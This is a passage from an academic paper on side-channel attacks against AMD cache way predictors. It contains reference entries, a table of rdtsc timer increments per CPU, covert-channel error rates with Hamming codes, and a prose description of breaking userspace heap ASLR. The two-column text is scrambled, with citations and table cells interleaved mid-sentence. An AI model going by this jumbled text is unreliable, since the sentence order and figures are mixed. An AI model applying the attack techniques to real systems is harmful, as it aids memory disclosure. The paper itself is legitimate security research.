Daniel Gruss, Clémentine Maurice, Michael Schwarz, and Stefan and Stefan Mangard. 2017. KASLR is Dead: Long Live KASLR. In ESSoS. Mangard. 2016. DRAMA: Exploiting DRAM Addressing for Cross-CPU Attacks. [28] Daniel Gruss, Clémentine Maurice, Anders Fogh, Moritz Lipp, and Stefan Man- In USENIX Security Symposium. gard. 2016. Prefetch Side-Channel Attacks: Bypassing SMAP and Kernel ASLR. [61] Moinuddin K Qureshi. 2019. New attacks and defense for encrypted-address In CCS. cache. In ISCA. [29] Daniel Gruss, Clémentine Maurice, and Stefan Mangard. 2016. Rowhammer.js: A [62] Chester Rebeiro, A. David Selvakumar, and A. S. L. Devi. 2006. Bitslice Imple- Remote Software-Induced Fault Attack in JavaScript. In DIMVA. mentation of AES. In Cryptology and Network Security (CANS). [30] Daniel Gruss, Clémentine Maurice, Klaus Wagner, and Stefan Mangard. 2016. [63] David J Sager and Glenn J Hinton. 2002. Way-predicting cache memory. US Flush+Flush: A Fast and Stealthy Cache Attack. In DIMVA. Patent 6,425,055. [31] Daniel Gruss, Raphael Spreitzer, and Stefan Mangard. 2015. Cache Template [64] Michael Schwarz, Claudio Canella, Lukas Giner, and Daniel Gruss. 2019. Store-to- Attacks: Automating Attacks on Inclusive Last-Level Caches. In USENIX Security Leak Forwarding: Leaking Data on Meltdown-resistant CPUs. arXiv:1905.05725 Symposium. (2019). [32] Shay Gueron. 2012. Intel Advanced Encryption Standard (Intel AES) Instructions [65] Michael Schwarz, Daniel Gruss, Samuel Weiser, Clémentine Maurice, and Stefan Set – Rev 3.01. Mangard. 2017. Malware Guard Extension: Using SGX to Conceal Cache Attacks [33] Richard W Hamming. 1950. Error detecting and error correcting codes. The Bell . In DIMVA. system technical journal (1950). [66] Michael Schwarz, Moritz Lipp, Daniel Gruss, Samuel Weiser, Clémentine Maurice, [34] Joel Hruska. 2019. AMD Gains Market Share in Desktop and , Slips in Raphael Spreitzer, and Stefan Mangard. 2018. KeyDrown: Eliminating Software- Servers. https://www.extremetech.com/computing/291032-amd Based Keystroke Timing Side-Channel Attacks. In NDSS. [35] Ralf Hund, Carsten Willems, and Thorsten Holz. 2013. Practical Timing Side [67] Michael Schwarz, Moritz Lipp, Daniel Moghimi, Jo Van Bulck, Julian Steck- Channel Attacks against Kernel Space ASLR. In S&P. lina, Thomas Prescher, and Daniel Gruss. 2019. ZombieLoad: Cross-Privilege- [36] Koji Inoue, Tohru Ishihara, and Kazuaki Murakami. 1999. Way-predicting set- Boundary Data Sampling. In CCS. associative cache for high performance and low energy consumption. In Sympo- [68] Michael Schwarz, Clémentine Maurice, Daniel Gruss, and Stefan Mangard. 2017. sium on Low Power Electronics and Design. Fantastic Timers and Where to Find Them: High-Resolution Microarchitectural [37] Gorka Irazoqui, Thomas Eisenbarth, and Berk Sunar. 2015. S$A: A Shared Cache Attacks in JavaScript. In FC. Attack that Works Across Cores and Defies VM Sandboxing – and its Application Take A Way: Exploring the Security Implications of AMD’s Cache Way Predictors ASIA CCS ’20, October 5–9, 2020, Taipei, Taiwan

Table 3: rdtsc increments on various CPUs. 3 2 Setup CPU 휇-arch. Increment 1 AMD Threadripper Ryzen 1920X Lab AMD X2 3800+ K8 1 AMD EPYC 7751 Error Rate [%] 0 Lab AMD Turion II Neo N40L K10 1 0 20 40 60 80 Lab AMD Phenom II X6 1055T K10 1 Lab AMD E-450 Bobcat 1 Number of Channels Lab AMD Athlon 5350 Jaguar 1 Lab AMD FX-4100 Bulldozer 1 Figure 6: Error rate of the covert channel. Lab AMD FX-8350 Piledriver 1 Lab AMD A10-7870K Steamroller 1 3 Lab AMD Ryzen Threadripper 1920X Zen 35 No Error Correction Hamming(7,4) Lab AMD Ryzen Threadripper 1950X Zen 34 2 Hamming(15,11) Lab AMD Ryzen Threadripper 1700X Zen 34 Lab AMD Ryzen Threadripper 2970WX Zen+ 30 1

Lab AMD Ryzen 7 3700X Zen 2 36 Error Rate [%] 0 Cloud AMD EPYC 7401p Zen 20 0 20 40 60 80 Cloud AMD EPYC 7571 Zen 22 Number of Channels

Figure 7: Error rate of the covert channel with and without [69] Michael Schwarz, Martin Schwarzl, Moritz Lipp, and Daniel Gruss. 2019. Net- Spectre: Read Arbitrary Memory over Network. In ESORICS. error correction using different Hamming codes. [70] Mark Seaborn. 2015. How physical addresses map to rows and banks in DRAM. http://lackingrhoticity.blogspot.com/2015/05/how-physical-addresses- map-to-rows-and-banks.html B COVERT CHANNEL ERROR RATE [71] Raphael Spreitzer and Thomas Plos. 2013. Cache-Access Pattern Attack on Disaligned AES T-Tables. In COSADE. Figure 6 illustrates the error rate of the covert channel described [72] Junko Takahashi, Toshinori Fukunaga, Kazumaro Aoki, and Hitoshi Fuji. 2013. in Section 5.1. The error rate increases drastically when transmitting Highly accurate key extraction method for access-driven cache attacks using correlation coefficient. In ACISP. more than 64 bits in parallel. Thus, we evaluated different hamming [73] Jo Van Bulck, Marina Minkin, Ofir Weisse, Daniel Genkin, Baris Kasikci, Frank codes on an AMD Ryzen Threadripper 1920X (Figure 7). Piessens, Mark Silberstein, Thomas F. Wenisch, Yuval Yarom, and Raoul Strackx. 2018. Foreshadow: Extracting the Keys to the Intel SGX Kingdom with Transient Out-of-Order Execution. In USENIX Security Symposium. C USERSPACE ASLR [74] Stephan van Schaik, Alyssa Milburn, Sebastian Österlund, Pietro Frigo, Giorgi Linux also uses ASLR for user processes by default. However, ran- Maisuradze, Kaveh Razavi, Herbert Bos, and Cristiano Giuffrida. 2019. RIDL: Rogue In-flight Data Load. In S&P. domizing the code section requires compiler support for position- [75] VMWare. 2018. Security considerations and disallowing inter-Virtual Machine independent code. The heap memory region is of particular interest Transparent Page Sharing (2080735). https://kb.vmware.com/s/article/2080735 [76] Mario Werner, Thomas Unterluggauer, Lukas Giner, Michael Schwarz, Daniel because it is located just after the code section with an offset of up Gruss, and Stefan Mangard. 2019. ScatterCache: Thwarting Cache Attacks via to 32 MB [47]. User programs use 4 kB pages, giving an effective Cache Set Randomization. In USENIX Security Symposium. 13-bit entropy for the start of the brk-based heap memory. [77] Felix Wilhelm. 2016. PoC for breaking hypervisor ASLR using branch target buffer collisions. https://github.com/felixwilhelm/mario_baslr It is possible to fully break heap ASLR through the use of 휇Tags. [78] Henry Wong. 2013. Intel Ivy Bridge Cache Replacement Policy. http://blog. An attack requires an interface to the victim application that incurs stuffedcow.net/2013/01/ivb-cache-replacement/ a victim access to data on the heap. We evaluated the ASLR break [79] John C Wray. 1992. An Analysis of Covert Timing Channels. Journal of Computer Security 1, 3-4 (1992), 219–232. using a client-server scenario in a toy application, where the at- [80] Mengjia Yan, Read Sprabery, Bhargava Gopireddy, Christopher Fletcher, Roy tacker is the malicious client. The attacker repeatedly sends benign Campbell, and Josep Torrellas. 2019. Attack directories, not caches: Side channel attacks in a non-inclusive world. In S&P. requests until it is distinguishable which tag is being accessed by [81] Yuval Yarom and Katrina Falkner. 2014. Flush+Reload: a High Resolution, Low the victim. This already reduces the ASLR entropy by 8 bits because Noise, L3 Cache Side-Channel Attack. In USENIX Security Symposium. it reveals a linear combination of the address bits. It is also possible [82] Xiaokuan Zhang, Yuan Xiao, and Yinqian Zhang. 2016. Return-oriented flush- reload side channels on arm and their implications for android devices. In CCS. to recover all address bits up to bit 27 by using the 휇Tags of multiple [83] Yinqian Zhang, Ari Juels, Michael K. Reiter, and Thomas Ristenpart. 2014. Cross- pages and solving the resulting equation system. Tenant Side-Channel Attacks in PaaS Clouds. In CCS. Again, a limitation is that the attack is susceptible to noise. Too many accesses while processing the attacker’s request negatively A RDTSC RESOLUTION impact the measurements such that the attacker will always observe We measure the resolution of the rdtsc instruction using the fol- a cache miss. In our experiments, we were not able to mount the lowing experimental setup. We assume that the timestamp counter attack using a socket-based interface. Hence, attacking other user- (TSC) is updated in a fixed interval. This assumption is based on space applications that rely on a more complex interface, e.g., using the documentation in the manual that the timestamp counter is D-Bus, is currently not practical. However, future work may refine independent of the CPU frequency [5]. Hence, there is a modulus our techniques to also mount attacks in more noisy scenarios. For 푥 and a constant 퐶, such that TSC mod 푥 ≡ 퐶 iff 푥 is the TSC our evaluation, we targeted a shared-memory-based API for high- increment. We can easily find this 푥 with brute-force, i.e., trying speed transmission without system calls [26] provided by the victim all different 푥 until we find an 푥, which always results in the same application. We were able to recover 13 bits with an average success value 퐶. Table 3 shows a rdtsc increments for the CPUs we tested. rate of 88.9 % in 1.94 s (휎 = 1.76 s, 푛 = 1000).